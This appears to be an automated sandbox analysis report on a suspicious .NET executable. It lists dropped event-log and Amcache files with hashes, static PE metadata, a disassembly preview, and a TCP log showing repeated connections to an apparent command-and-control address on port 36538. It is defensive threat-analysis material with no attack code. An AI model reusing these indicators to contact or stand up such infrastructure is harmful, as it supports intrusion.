                                                                                                                                                                                                                                              Preview:ElfChnk........."..............."...........h8...9....?......................................................................Z..................&...........................=...........................................................................................................................f...............?...........................m...................M...F...........................&...............................v.......&*..............................................................................**..P...........y................&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                                                                                                                                                                                                              C:\Windows\System32\winevt\Logs\Microsoft-Windows-Windows Firewall With Advanced Security%4Firewall.evtx

                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                              Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):65536
                                                                                                                                                                                                                                              Entropy (8bit):4.22241882767171
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:384:vohcBwBuBwB+BwBZwDIBwBoK/oyBwBY/puBwBN0bNoBwByQZBwBY/UUBwBY/5BwP:QI0bRnHrL
                                                                                                                                                                                                                                              MD5:60A8B4D89584BE18E3AC4252B06003FD
                                                                                                                                                                                                                                              SHA1:DB4BC767023047C6700A5121901A0A187EEBACBC
                                                                                                                                                                                                                                              SHA-256:F4BC9BD72BA8C12A82E279F0EA4F8E8986C4C43289B47662E8B9837FC76F4C28
                                                                                                                                                                                                                                              SHA-512:716AF5AA5BA1BEADC9C984A0F7C3318A1E299F5C88FC8A2A25CE78C196CED99620C4F54DB4A813326287CF0B07BFC521E250108C998AD857C9693DA9B997AA29
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:ElfChnk.....................................H;..x>..+.I.......................................................................t............................................=...........................................................................................................................f...............?...........................m...................M...F...........................o.......................................&...............................................................................**..(...............`...........E!&.........E!.._c..Y..........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                                                                                                                                                                                                              C:\Windows\System32\winevt\Logs\Microsoft-Windows-Winlogon%4Operational.evtx

                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                              Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):65536
                                                                                                                                                                                                                                              Entropy (8bit):4.423183909657457
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:384:/hGUEBUEYUEQUEhUE8UE5UE5UE8UExUEFUELUEVUEyUEXUEDUEuDUEBUEWUEzUE3:/P7s3NxG9
                                                                                                                                                                                                                                              MD5:718C0E7FA4C2A524A5FF961FEB987C13
                                                                                                                                                                                                                                              SHA1:73CB0C09C67332548F50613AA349E12695C715A2
                                                                                                                                                                                                                                              SHA-256:461F7778DD38ABE30403674C9E34EFF22F91AB7D4C207FB8CD2C4B31773588CC
                                                                                                                                                                                                                                              SHA-512:6A7705597D00B2193F3ECD79CDCD4B6D97DA36B879ECBC2E5F8EA3A8B77D9FA301B14E68BBB9ACBBF72B695DC83E66493F3C4D1DD94B1FC9D0E4ABA787BD853B
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:ElfChnk.....................................0`...a.....r........................................................................................0.......................X...=...........................................................................................................................f...............?...........................m...................M...F...........................................................................................................................A.......................**.................`...........E!&.........E!.._c..Y..........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                                                                                                                                                                                                              C:\Windows\System32\winevt\Logs\Security.evtx

                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                              Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):48112
                                                                                                                                                                                                                                              Entropy (8bit):4.475149764335128
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:384:sFR0BM2s7NVoGMtUH6uoxMtJoLVfIoHzopYo9xoHEopxo9hoHxopxPWBXSoQKNBO:aA0NHLcZH9/M1qQ
                                                                                                                                                                                                                                              MD5:11E1EEF7DA5F564D33EA6C1A60AAA427
                                                                                                                                                                                                                                              SHA1:F9C130589F8A2239756991289C161134B6FEB765
                                                                                                                                                                                                                                              SHA-256:0BDE4AF03EA231681014BD2A9D730B46563AD4780305712433FD2C8A9EE4B2DA
                                                                                                                                                                                                                                              SHA-512:55CEEFE63377CF46BC9AD4727F2A0258F488240A493FDE866E29F1488E7E3B11E6BD614326E63E389895875EEC9A89E0B997DE589B91043471BAD1D649341948
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:ElfChnk.................(.......:...........pH...M../.@.................................................................................!.......z...s...h...................=...................................................N...............................................w.......<.......................5...................................c...........).......M...Z...:....................8......C?..S...............................V....................................................................I...#......**..0...(........j.q...........<.@&........<.@.o.S....../.G.......A..;...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.....d...........oT..S.y.s.t.e.m....A...............{..P.r.o.v.i.d.e.r.......F=.......K...N.a.m.e.......M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.E.v.e.n.t.l.o.g..........)...G.u.i.d.....&.{.f.c.6.5.d.d.d.8.-.d.6.e.f.-.4.9.6.2.-.8.3.d.5.-.6.e.5.c.f.e.9.c.e.1.

                                                                                                                                                                                                                                              C:\Windows\System32\winevt\Logs\System.evtx

                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                              Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):82176
                                                                                                                                                                                                                                              Entropy (8bit):4.417316116559936
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:384:ZFRXnVWBwB3+AFRXnVWBwB3+wtLzfrEdI74mjo6bPwtrQMUU5963XRs+5dXNlZn1:zESEuGi0tJaN3HpRAtFzELQ4
                                                                                                                                                                                                                                              MD5:DE68791DB4CE60CB197725337EFE6596
                                                                                                                                                                                                                                              SHA1:C7F5BBC3E92F7135240F4734EAC411F5202F64C0
                                                                                                                                                                                                                                              SHA-256:5A5BDAB8F0F1F0FB044BA4E5EA1936640646CE7E5BB0FB4BB8F2818C322E3B8A
                                                                                                                                                                                                                                              SHA-512:E31EAD28D43B4F9BFF66005AC0466825C70E98A9E9C0B6339E0448EA63A1D6C7776ED5FD34BACDC163BCF6F1A18B0EA29119CB343402B2BDA3B6A96908A793BA
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:ElfChnk.........................................x....=(.......................................................................f.....................s...h...................=...................................................N...............................................w.......8.......................M..................................._...........).......M...;...:...........................................................q...v...........................................&.......................&...........**..P............j.q...........v..&........v..Tr].4....E.C.......A..7...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.....`...........oT..S.y.s.t.e.m....A...............{..P.r.o.v.i.d.e.r.......F=.......K...N.a.m.e.......M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.E.v.e.n.t.l.o.g..........)...G.u.i.d.....&.{.f.c.6.5.d.d.d.8.-.d.6.e.f.-.4.9.6.2.-.8.3.d.5.-.6.e.5.c.f.e.9.c.e.1.

                                                                                                                                                                                                                                              C:\Windows\appcompat\Programs\Amcache.hve

                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                              Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                                                              File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):1835008
                                                                                                                                                                                                                                              Entropy (8bit):4.416700353481133
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:6144:Vcifpi6ceLPL9skLmb0mKSWSPtaJG8nAgex285i2MMhA20X4WABlGuNU5+:yi58KSWIZBk2MM6AFBuo
                                                                                                                                                                                                                                              MD5:472932025148C60D26B2EF3B9646DFFD
                                                                                                                                                                                                                                              SHA1:7F49BDF1B8F7485767E6EF64CDDED4A58D928F88
                                                                                                                                                                                                                                              SHA-256:0899DA1642F33DEDD985251D82829F1394628D5315C247AF5C10E4F7CF1EF68E
                                                                                                                                                                                                                                              SHA-512:7D0D74A4F7CC13B4DA282700FEEB3EDBBB0AB335099E1A5BCC2F0F59046E945B7902B564EB31108998BA5AF12ADF1D48EE660760683C8F9A6F5DB0AF63B416DF
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:regfE...E....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm...u..................................................................................................................................................................................................................................................................................................................................................A........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                              Static File Info

                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                              File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                              Entropy (8bit):4.641008170456594
                                                                                                                                                                                                                                              TrID:
                                                                                                                                                                                                                                              • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                                                                                                                                                                                              • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                                                                                                                                                                                              • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                                                                                                                                                                              • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                                                                                                                                                              • DOS Executable Generic (2002/1) 0.01%
                                                                                                                                                                                                                                              File name:r8k29DBraE.exe
                                                                                                                                                                                                                                              File size:571'904 bytes
                                                                                                                                                                                                                                              MD5:dc50baff9f1bab10f1ebc24e0d77afc3
                                                                                                                                                                                                                                              SHA1:29f4429939e57666b8a57c2d7b95a4801fa7ca20
                                                                                                                                                                                                                                              SHA256:03c95970bb3d91530aa29f9199ac1b2d7082672909e9c1a30804f99ebc9643b7
                                                                                                                                                                                                                                              SHA512:6249ae2e738515d2f453310ad8e9730334997796477f88f0e1a72086154b0348b07da7c651b835f8e8b84ac43452fd0d87b5c40400d8a9a6297e802ae045a152
                                                                                                                                                                                                                                              SSDEEP:6144:mujuIGjAOphSW579i8fB106f91hYC1l+W8GSAZ2nxKdn3wGK570:LRaAODHVrB/lDH8gZhdAY
                                                                                                                                                                                                                                              TLSH:10C4AD143268FA73D45D7ABDC802F65007746E113ED2D5B639787BBE1E32ADB46032A2
                                                                                                                                                                                                                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...S._..........."...0.............n.... ... ....@.. ....................................`................................

                                                                                                                                                                                                                                              File Icon

                                                                                                                                                                                                                                              Icon Hash:17294d52534d5270

                                                                                                                                                                                                                                              Static PE Info

                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                              Entrypoint:0x431c6e
                                                                                                                                                                                                                                              Entrypoint Section:.text
                                                                                                                                                                                                                                              Digitally signed:false
                                                                                                                                                                                                                                              Imagebase:0x400000
                                                                                                                                                                                                                                              Subsystem:windows gui
                                                                                                                                                                                                                                              Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                                                                                                                                                                                              DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                                              Time Stamp:0xDB5F1B53 [Sat Aug 17 17:20:19 2086 UTC]
                                                                                                                                                                                                                                              TLS Callbacks:
                                                                                                                                                                                                                                              CLR (.Net) Version:
                                                                                                                                                                                                                                              OS Version Major:4
                                                                                                                                                                                                                                              OS Version Minor:0
                                                                                                                                                                                                                                              File Version Major:4
                                                                                                                                                                                                                                              File Version Minor:0
                                                                                                                                                                                                                                              Subsystem Version Major:4
                                                                                                                                                                                                                                              Subsystem Version Minor:0
                                                                                                                                                                                                                                              Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                                                                                                                                                                                              Entrypoint Preview

                                                                                                                                                                                                                                              Instruction
                                                                                                                                                                                                                                              jmp dword ptr [00402000h]
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al

                                                                                                                                                                                                                                              Data Directories

                                                                                                                                                                                                                                              NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_IMPORT0x31c140x57.text
                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x320000x5b6c5.rsrc
                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x8e0000xc.reloc
                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                                                                                                              Sections

                                                                                                                                                                                                                                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                                                              .text0x20000x2fc740x2fe0051486e0d4be29e334b3561dcf0bdf96dFalse0.8480030189295039data7.739802708970689IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                              .rsrc0x320000x5b6c50x5b80021da889dcdf6a6e55a63a508de6a660eFalse0.048582650273224046data2.056326055038315IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                              .reloc0x8e0000xc0x2007abbba69a828c23cc023fde0da5fb353False0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                                                                                                                                                              Resources

                                                                                                                                                                                                                                              NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                                                                                              RT_ICON0x322200x42028Device independent bitmap graphic, 256 x 512 x 32, image size 262144, resolution 2835 x 2835 px/m0.030649909755303725
                                                                                                                                                                                                                                              RT_ICON0x742480x468Device independent bitmap graphic, 16 x 32 x 32, image size 1024, resolution 2835 x 2835 px/m0.3617021276595745
                                                                                                                                                                                                                                              RT_ICON0x746b00x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 2835 x 2835 px/m0.14076763485477178
                                                                                                                                                                                                                                              RT_ICON0x76c580x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 2835 x 2835 px/m0.20309568480300189
                                                                                                                                                                                                                                              RT_ICON0x77d000x10828Device independent bitmap graphic, 128 x 256 x 32, image size 65536, resolution 2835 x 2835 px/m0.055675499822548206
                                                                                                                                                                                                                                              RT_ICON0x885280x4228Device independent bitmap graphic, 64 x 128 x 32, image size 16384, resolution 2835 x 2835 px/m0.10781766650921115
                                                                                                                                                                                                                                              RT_GROUP_ICON0x8c7500x5adata0.7555555555555555
                                                                                                                                                                                                                                              RT_VERSION0x8c7ac0x31cdata0.43090452261306533
                                                                                                                                                                                                                                              RT_MANIFEST0x8cac80xbfdXML 1.0 document, Unicode text, UTF-8 (with BOM) text0.4001303356142066

                                                                                                                                                                                                                                              Imports

                                                                                                                                                                                                                                              DLLImport
                                                                                                                                                                                                                                              mscoree.dll_CorExeMain

                                                                                                                                                                                                                                              Network Behavior

                                                                                                                                                                                                                                              Network Port Distribution

                                                                                                                                                                                                                                              TCP Packets

                                                                                                                                                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                              Oct 15, 2024 11:20:27.189583063 CEST49731443192.168.2.7104.26.2.16
                                                                                                                                                                                                                                              Oct 15, 2024 11:20:27.189594984 CEST44349731104.26.2.16192.168.2.7
                                                                                                                                                                                                                                              Oct 15, 2024 11:20:27.189668894 CEST49731443192.168.2.7104.26.2.16
                                                                                                                                                                                                                                              Oct 15, 2024 11:20:27.244190931 CEST49731443192.168.2.7104.26.2.16
                                                                                                                                                                                                                                              Oct 15, 2024 11:20:27.244205952 CEST44349731104.26.2.16192.168.2.7
                                                                                                                                                                                                                                              Oct 15, 2024 11:20:27.892817020 CEST44349731104.26.2.16192.168.2.7
                                                                                                                                                                                                                                              Oct 15, 2024 11:20:27.892894983 CEST49731443192.168.2.7104.26.2.16
                                                                                                                                                                                                                                              Oct 15, 2024 11:20:27.901534081 CEST49731443192.168.2.7104.26.2.16
                                                                                                                                                                                                                                              Oct 15, 2024 11:20:27.901547909 CEST44349731104.26.2.16192.168.2.7
                                                                                                                                                                                                                                              Oct 15, 2024 11:20:27.902040958 CEST44349731104.26.2.16192.168.2.7
                                                                                                                                                                                                                                              Oct 15, 2024 11:20:27.942365885 CEST49731443192.168.2.7104.26.2.16
                                                                                                                                                                                                                                              Oct 15, 2024 11:20:27.966043949 CEST49731443192.168.2.7104.26.2.16
                                                                                                                                                                                                                                              Oct 15, 2024 11:20:28.011401892 CEST44349731104.26.2.16192.168.2.7
                                                                                                                                                                                                                                              Oct 15, 2024 11:20:28.293404102 CEST44349731104.26.2.16192.168.2.7
                                                                                                                                                                                                                                              Oct 15, 2024 11:20:28.293487072 CEST44349731104.26.2.16192.168.2.7
                                                                                                                                                                                                                                              Oct 15, 2024 11:20:28.293560982 CEST49731443192.168.2.7104.26.2.16
                                                                                                                                                                                                                                              Oct 15, 2024 11:20:28.319114923 CEST49731443192.168.2.7104.26.2.16
                                                                                                                                                                                                                                              Oct 15, 2024 11:20:28.482125044 CEST4974036538192.168.2.7147.185.221.18
                                                                                                                                                                                                                                              Oct 15, 2024 11:20:28.487030983 CEST3653849740147.185.221.18192.168.2.7
                                                                                                                                                                                                                                              Oct 15, 2024 11:20:28.487102032 CEST4974036538192.168.2.7147.185.221.18
                                                                                                                                                                                                                                              Oct 15, 2024 11:20:28.661955118 CEST4974036538192.168.2.7147.185.221.18
                                                                                                                                                                                                                                              Oct 15, 2024 11:20:28.667120934 CEST3653849740147.185.221.18192.168.2.7
                                                                                                                                                                                                                                              Oct 15, 2024 11:20:33.359874964 CEST49767443192.168.2.7169.197.85.95
                                                                                                                                                                                                                                              Oct 15, 2024 11:20:33.359895945 CEST44349767169.197.85.95192.168.2.7
                                                                                                                                                                                                                                              Oct 15, 2024 11:20:33.359960079 CEST49767443192.168.2.7169.197.85.95
                                                                                                                                                                                                                                              Oct 15, 2024 11:20:33.360724926 CEST49767443192.168.2.7169.197.85.95
                                                                                                                                                                                                                                              Oct 15, 2024 11:20:33.360738039 CEST44349767169.197.85.95192.168.2.7
                                                                                                                                                                                                                                              Oct 15, 2024 11:20:34.076546907 CEST44349767169.197.85.95192.168.2.7
                                                                                                                                                                                                                                              Oct 15, 2024 11:20:34.076632977 CEST49767443192.168.2.7169.197.85.95
                                                                                                                                                                                                                                              Oct 15, 2024 11:20:34.087690115 CEST49767443192.168.2.7169.197.85.95
                                                                                                                                                                                                                                              Oct 15, 2024 11:20:34.087723017 CEST44349767169.197.85.95192.168.2.7
                                                                                                                                                                                                                                              Oct 15, 2024 11:20:34.088017941 CEST44349767169.197.85.95192.168.2.7
                                                                                                                                                                                                                                              Oct 15, 2024 11:20:34.102899075 CEST49767443192.168.2.7169.197.85.95
                                                                                                                                                                                                                                              Oct 15, 2024 11:20:34.147416115 CEST44349767169.197.85.95192.168.2.7
                                                                                                                                                                                                                                              Oct 15, 2024 11:20:34.306485891 CEST44349767169.197.85.95192.168.2.7
                                                                                                                                                                                                                                              Oct 15, 2024 11:20:34.306550026 CEST44349767169.197.85.95192.168.2.7
                                                                                                                                                                                                                                              Oct 15, 2024 11:20:34.306602001 CEST49767443192.168.2.7169.197.85.95
                                                                                                                                                                                                                                              Oct 15, 2024 11:20:34.317085981 CEST49767443192.168.2.7169.197.85.95
                                                                                                                                                                                                                                              Oct 15, 2024 11:20:34.317106009 CEST44349767169.197.85.95192.168.2.7
                                                                                                                                                                                                                                              Oct 15, 2024 11:20:34.317600965 CEST49773443192.168.2.7169.197.85.95
                                                                                                                                                                                                                                              Oct 15, 2024 11:20:34.317653894 CEST44349773169.197.85.95192.168.2.7
                                                                                                                                                                                                                                              Oct 15, 2024 11:20:34.318021059 CEST49773443192.168.2.7169.197.85.95
                                                                                                                                                                                                                                              Oct 15, 2024 11:20:34.318303108 CEST49773443192.168.2.7169.197.85.95
                                                                                                                                                                                                                                              Oct 15, 2024 11:20:34.318325996 CEST44349773169.197.85.95192.168.2.7
                                                                                                                                                                                                                                              Oct 15, 2024 11:20:35.038033962 CEST44349773169.197.85.95192.168.2.7
                                                                                                                                                                                                                                              Oct 15, 2024 11:20:35.045526981 CEST49773443192.168.2.7169.197.85.95
                                                                                                                                                                                                                                              Oct 15, 2024 11:20:35.045552015 CEST44349773169.197.85.95192.168.2.7
                                                                                                                                                                                                                                              Oct 15, 2024 11:20:35.248979092 CEST44349773169.197.85.95192.168.2.7
                                                                                                                                                                                                                                              Oct 15, 2024 11:20:35.249027967 CEST44349773169.197.85.95192.168.2.7
                                                                                                                                                                                                                                              Oct 15, 2024 11:20:35.249087095 CEST49773443192.168.2.7169.197.85.95
                                                                                                                                                                                                                                              Oct 15, 2024 11:20:35.289311886 CEST49773443192.168.2.7169.197.85.95
                                                                                                                                                                                                                                              Oct 15, 2024 11:20:35.289334059 CEST44349773169.197.85.95192.168.2.7
                                                                                                                                                                                                                                              Oct 15, 2024 11:20:36.988104105 CEST3653849740147.185.221.18192.168.2.7
                                                                                                                                                                                                                                              Oct 15, 2024 11:20:36.988181114 CEST4974036538192.168.2.7147.185.221.18
                                                                                                                                                                                                                                              Oct 15, 2024 11:20:37.068414927 CEST4974036538192.168.2.7147.185.221.18
                                                                                                                                                                                                                                              Oct 15, 2024 11:20:37.073350906 CEST3653849740147.185.221.18192.168.2.7
                                                                                                                                                                                                                                              Oct 15, 2024 11:20:37.081928015 CEST4978436538192.168.2.7147.185.221.18
